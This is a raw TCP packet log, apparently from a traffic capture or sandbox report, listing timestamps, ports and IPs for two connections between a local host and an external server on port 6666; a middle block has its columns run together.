Oct 7, 2024 06:39:10.320342064 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.320355892 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320389986 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320422888 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320436001 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.320458889 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.320475101 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.321101904 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321151972 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321157932 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.321187019 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321219921 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321244001 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.321254969 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321286917 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.321310043 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.361835957 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.545775890 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545819044 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545876026 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545911074 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545947075 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545980930 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.545990944 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.545990944 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546025038 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546058893 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546058893 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546093941 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546113968 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546128988 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546164989 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546184063 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546196938 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546235085 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546262026 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546468973 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546503067 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546524048 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546536922 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546571016 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546588898 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546679020 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546731949 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546732903 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546787977 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546822071 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546840906 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.546855927 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.546924114 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547195911 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547251940 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547288895 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547307014 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547322035 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547355890 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547372103 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547419071 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547452927 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547475100 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547487020 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547527075 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547549963 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547878027 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547911882 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547935963 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.547965050 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.547997952 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548021078 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548032045 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548065901 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548089981 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548120022 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548152924 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548178911 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548187017 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548221111 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548242092 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548257113 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548310995 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548775911 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548831940 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548883915 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548890114 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.548918962 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548952103 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.548973083 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.549005032 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549038887 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549063921 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.549072027 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549105883 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549139977 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549149036 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.549176931 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549196959 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.549710035 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549763918 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549770117 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.549798012 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549832106 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.549851894 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.596216917 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774056911 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774131060 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774167061 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774223089 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774219036 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774262905 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774286985 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774305105 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774339914 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774355888 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774375916 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774410009 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774429083 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774442911 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774477005 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774493933 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774508953 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774544001 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774558067 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774578094 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774612904 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774625063 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774642944 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774660110 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774679899 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774696112 CEST  49707  6666   192.168.2.5     47.239.116.158
Oct 7, 2024 06:39:10.774697065 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774714947 CEST  6666   49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:10.774730921 CEST  6666   49707  47.239.116.158  192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774730921 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774746895 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774764061 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774769068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774781942 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774792910 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774806023 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774832010 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774838924 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774857044 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774887085 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.774919033 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774935961 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774951935 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774970055 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.774975061 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775002956 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775083065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775099993 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775116920 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775125027 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775134087 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775135994 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775240898 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775620937 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775645971 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775664091 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775680065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775697947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775706053 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775737047 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775746107 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775755882 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775784016 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775785923 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775804043 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775820971 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775835037 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775839090 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775868893 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.775974035 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.775990963 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776021957 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776032925 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776040077 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776051044 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776067019 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776076078 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776086092 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776094913 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776118994 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776166916 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776654005 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776684046 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776699066 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776732922 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776755095 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776772976 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776788950 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776804924 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776808977 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776858091 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776915073 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776933908 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776951075 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776963949 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.776968956 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776987076 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.776995897 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777004004 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777020931 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777034044 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777036905 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777055979 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777072906 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777097940 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777589083 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777647972 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777663946 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777690887 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777694941 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777708054 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777725935 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777736902 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777744055 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777774096 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777878046 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777894020 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777909994 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777925968 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777929068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777944088 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777961969 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777967930 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777980089 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.777992964 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.777998924 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778018951 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778038025 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778067112 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778553009 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778570890 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778587103 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778604031 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:10.778620958 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:10.778652906 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.001990080 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002062082 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002098083 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002135038 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002171040 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002170086 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002206087 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002226114 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002269030 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002274990 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002311945 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002346992 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002367973 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002379894 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002413988 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002433062 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002446890 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002480984 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002502918 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002513885 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002547979 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002568007 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002585888 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002619982 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002640009 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002671003 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002708912 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002728939 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002769947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002823114 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002824068 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002856970 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002895117 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002909899 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.002945900 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.002980947 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003000975 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003032923 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003067970 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003089905 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003102064 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003138065 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003154039 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003171921 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003206015 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003228903 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003238916 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003274918 CEST66664970747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:11.003292084 CEST497076666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:11.003309011 CEST66664970747.239.116.158192.168.2.5
Oct 7, 2024 06:39:11.003343105 CEST  6666  49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:11.003375053 CEST  6666  49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:11.003381968 CEST  49707  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:11.003426075 CEST  49707  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:11.003444910 CEST  6666  49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:11.003479004 CEST  6666  49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:11.003518105 CEST  6666  49707  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:11.003534079 CEST  49707  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:11.049455881 CEST  49707  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:13.349332094 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:13.355263948 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:13.355334044 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:13.355916023 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:13.361742973 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.242328882 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.242614985 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.249723911 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.249747992 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.249830961 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.782957077 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783015966 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783051014 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783083916 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783102989 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.783117056 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783149958 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783150911 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.783185005 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783216953 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783233881 CEST  49709  6666  192.168.2.5  47.239.116.158
Oct 7, 2024 06:39:14.783251047 CEST  6666  49709  47.239.116.158  192.168.2.5
Oct 7, 2024 06:39:14.783256054 CEST  49709  6666  192.168.2.5  47.239.116.158
